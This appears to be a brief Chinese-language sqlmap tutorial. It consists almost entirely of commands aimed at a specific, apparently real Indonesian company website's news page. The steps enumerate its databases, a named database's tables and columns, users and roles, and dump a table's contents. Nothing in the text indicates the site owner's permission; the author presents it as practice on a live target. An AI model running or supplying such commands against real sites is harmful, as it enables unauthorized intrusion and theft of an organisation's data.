0x00根据注入点爆出数据库
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --dbs
0x01根据数据库爆出表名
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --tables -D u9897uwx_kabel
0x02练点其他的
1.查找某张表的字段信息
比如这里查找最后一张表(tbnomax)的字段信息
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --columns -T tbnomax
2.提取整个表的具体内容
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --dump -T tbnomax
3.敏感字段进行16进制编码
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --columns -T tbnomax --hex
4.查找用户
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --users
5.提取所有信息
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 -a
6.查看用户角色信息
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --roles
end~